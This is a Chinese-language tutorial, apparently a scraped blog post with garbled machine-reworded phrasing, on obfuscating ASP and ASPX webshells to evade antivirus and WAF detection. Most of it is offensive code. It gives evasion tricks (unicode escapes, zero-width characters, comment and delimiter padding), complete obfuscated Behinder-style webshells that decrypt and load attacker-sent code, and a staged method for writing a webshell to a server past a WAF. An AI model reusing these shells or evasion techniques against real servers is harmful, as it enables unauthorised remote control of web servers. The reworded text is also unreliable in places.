phpstrhex技巧_理解webshell变形的一些思路

文章目录 [+]

1、unicode编码2、空字符串连接3、<%%>截断3、头部更换5、分外符号@6、注释1.unicode编码

例如"eval"他可以变为\u0065\u0076\u0061\u006C

那么如下例子可以转换为：

phpstrhex技巧_理解webshell变形的一些思路

<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["hello"],"unsafe");%>

在JScript的情形下它不支持大U和多个0的增加，但是在c#的情形下，是可以支持大U和多个0的增加。

（图片来自网络侵删）

2、空字符串连接

unicode是支持在aspx里进行的，同样的，它也支持asmx和ashx，估计这类特性都是通用的。
并且在unicode有一类字符叫做零宽连字符(全称zero width joiner)。

在函数字符串中插入这些字符都不会影响脚本的正常运行，在测试前须要把稳该类字符插入的位置，否则插入缺点的地方会产生报错

\u200c\u200d\u200e\u200f

除了上面的zero width joiner，还有一种unicode编码叫做零宽不折行空格，也便是如下几种字符，都支持在字符间进行拼接

\ufeff\u202a\u202b\u202c\u202d\u202e

例子：

<%c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);%>3、利用<%%>语法

将全体字符串与函数利用多个<%%>进行分割

<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c%><%(Request.%>4、头部免杀

该字段可以放在后面，不一定要放前面

<%@Page Language="csharp"%><%@ Page Language="Jscript"%><%@Page Language=JS%><% @language="Csharp" %>5、利用符号

可以添加@符号但是不会影响其解析

<%.@CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key))%>6、注释插入

<%/TreeObject/./TreeObject/GetBytes(Session[0] + ""),%>7、花括号和分号

{}和分号;在原来语法结束的地方可以添加大量的该类稠浊，不会影响其原来的解析

<% @page language=c#%>;;;;;;;;;;;;;;;;;;;;<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");{{{}}} byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);{{{;}}} Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>

8、aspx别的声明标签

在php中，解析引擎可以认识

1、XML标记风格<?phpecho "XML 标记风格"；?>2、脚本风格<script language='php'>echo "脚本风格"；</script>3、简短标记风格<?echo "简短标记风格"；?>把稳php.ini中的short_open_tag 选项必须为on4、ASP标记风格<%echo '这是asp标记风格'%>把稳php.ini中的asp_tags 选项必须为on

aspx中也有类似的标签风格，如下：

<% @language="C#" %><%Response.Write("hello");%>

<script language=csharp runat=server>void page_load(){Response.Write("hello");}</script>9、换行特性10、c#的 ///特性和xml

c#规定了/// 能够在aspx中作为xml语法的注释，那么在实际利用中，我们结合换行、unicode特性可以这样做，在如下内容中加入///充当注释：

<%@language = c#%><%@Import Namespace="System.Reflection"%><%Session.Add("k",//////@#@!#!@#!@#!@#!@#!@#!@#"e45e329feb5d925b"); byte[]//////@#@!#!@#!@#!@#!@#!@#!@# k = Encoding.Default.GetBytes(Session[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); //////@#@!#!@#!@#!@#!@#!@#!@#%>

那么这时我们综上所说到的这些特性，对冰蝎马进行免杀处理，可以得到如下内容：

<%@Import Namespace="System./TreeObject/\U00000052\U00000065\U00000066\U0000006C\U00000065\U00000063\U00000074\U00000069\U0000006F\U0000006E"%><%\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E/TreeObject/.\U00000041\U00000064\U00000064("k","e45e329feb5d925b"); %><%byte[] k = \U00000045\U0000006E\U00000063\U0000006F\U00000064\U00000069\U0000006E\U00000067/TreeObject/./TreeObject/Default%><%/TreeObject/./TreeObject/\U00000047\U00000065\U00000074\U00000042\U00000079\U00000074\U00000065\U00000073(\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#%><%c = \U00000052\U00000065\U00000071\U00000075\U00000065\U00000073\U00000074/TreeObject/./TreeObject/\U00000042\U00000069\U0000006E\U00000061\U00000072\U00000079\U00000052\U00000065\U00000061\U00000064/TreeObject/(Request.ContentLength);//////@#@!#!@#!@#!@#!@#!@#!@#/TreeObject/%><%Assembly/TreeObject/./TreeObject/@\U0000004C\U0000006F\U00000061\U00000064(new System./TreeObject/Security%><%./TreeObject/@\U00000043\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000067\U00000072\U00000061\U00000070\U00000068\U00000079.\U00000052\U00000069\U0000006A\U0000006E\U00000064\U00000061\U00000065\U0000006C\U0000004D\U00000061\U0000006E\U00000061\U00000067\U00000065\U00000064()%><%./TreeObject/@\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U00000044\U00000065\U00000063\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000072(k, k)%><%./TreeObject/@\U00000054\U00000072\U00000061\U0000006E\U00000073\U00000066\U0000006F\U00000072\U0000006D\U00000046\U00000069\U0000006E\U00000061\U0000006C\U00000042\U0000006C\U0000006F\U00000063\U0000006B(c, 0, c.Length))%><%./TreeObject/\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U0000202c\U00000049\U0000006E\U00000073\U00000074\U00000061\U0000006E\U00000063\U00000065/TreeObject/%><%(/TreeObject/"U"/TreeObject/%><%)%><%./TreeObject/\U00000045\U00000071\U00000075\U00000061\U0000006C\U00000073(this);{{{;}}}%><% @language="CSHARP" %>

同理，哥斯拉等其他的也可以按照这种方法作免杀处理。

二、ASP类型

可通过变量赋值更换，组合换行的办法进行免杀

比如常见的一句话通过变量赋值更换，即可免杀D盾

<%dim a(5)%><%a(0) = request("404")%><%b = LTrim(a(0))%><%response.write("hello")%><%eXecUTe(b)%>

那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理，同样得到如下内容：

<%Response.write("Welcome,This is a TestPage")%><%dim a(5)%><%Response.CharSet = "UTF-8"%> <%k="3b0c14770e6bd663" %><%Session("k")=k%><%size=Request.TotalBytes%><%content=Request.BinaryRead(size)%><%For i=1 To size%><%x=ascb(midb(content,i,1))%><%y=Asc(Mid(k,(i and 15)+1,1))%><%result=result&Chr(x Xor y)%><%a(0)=result%><%b = LTrim(a(0))%><%Next%><%%>

ps：再补充一个之前在xx项目测试中，利用中间马的办法绕过waf写入webshell，大概事理便是先上传一个写文件功能的，利用该功能再往目标做事器写入webshell。

往当前目录写入TypeError.asp，文件内容为<%response.write("hello")%>

Server.CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(Server.MapPath(\"TypeError.asp\"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))

个中我们再定义两个函数用于稠浊

Function JXMD(MM):MM = Split(MM,"-")For x=0 To Ubound(MM)JXMD=JXMD&Chr(MM(x))NextEnd FunctionFunction HexToStr(ByRef strHex)Dim LengthDim MaxDim StrMax = Len(strHex)For Length = 1 To Max Step 2Str = Str & Chr("&h" & Mid(strHex, Length, 2))NextHexToStr = StrEnd function

ok，接下来我们再做一下数据处理

末了可以得到如下内容：

<%%>

同样也是具有免杀效果的

这里可以看到访问02.asp成功往目标做事器当前目录写入预先内容的TypeError.asp

利用这种办法，我们便可以绕过waf往目标写入webshell，从而获取做事器权限。

同理，aspx类型的也可以利用这种办法考试测验绕过waf写入对应的webshell。